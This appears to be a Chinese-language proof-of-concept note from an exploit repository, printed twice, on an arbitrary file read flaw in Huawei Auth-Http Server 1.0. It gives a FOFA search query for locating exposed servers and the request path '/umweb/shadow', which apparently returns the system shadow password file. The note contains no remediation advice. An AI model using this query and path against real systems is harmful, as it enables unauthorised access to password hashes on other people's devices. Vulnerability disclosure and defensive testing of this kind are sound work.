POC/wpoc/华为/华为Auth-HttpServer1.0存在任意文件读取.md

# 华为Auth-Http Server 1.0存在任意文件读取

# 一、漏洞简介
华为Auth-Http Server 1.0存在任意文件读取漏洞

# 二、影响版本
+ 华为Auth-Http Server 1.0

# 三、资产测绘
+ fofa`server="Huawei Auth-Http Server 1.0"`
+ 特征

![1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e.png](./img/awN0FrlYIE9HHmOb/1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e-662211.png)

## 四、漏洞复现
```plain
/umweb/shadow
```

![1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a.png](./img/awN0FrlYIE9HHmOb/1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a-439777.png)


> 更新: 2024-02-29 23:57:13  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2>
first commit 2025-03-04 23:12:57 +08:00			`# 华为Auth-Http Server 1.0存在任意文件读取`

			`# 一、漏洞简介`
			`华为Auth-Http Server 1.0存在任意文件读取漏洞`

			`# 二、影响版本`
			`+ 华为Auth-Http Server 1.0`

			`# 三、资产测绘`
			+ fofa`server="Huawei Auth-Http Server 1.0"`
			`+ 特征`

			`![1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e.png](./img/awN0FrlYIE9HHmOb/1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e-662211.png)`

			`## 四、漏洞复现`
			```plain
			`/umweb/shadow`
			```

			`![1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a.png](./img/awN0FrlYIE9HHmOb/1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a-439777.png)`



			`> 更新: 2024-02-29 23:57:13`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2>`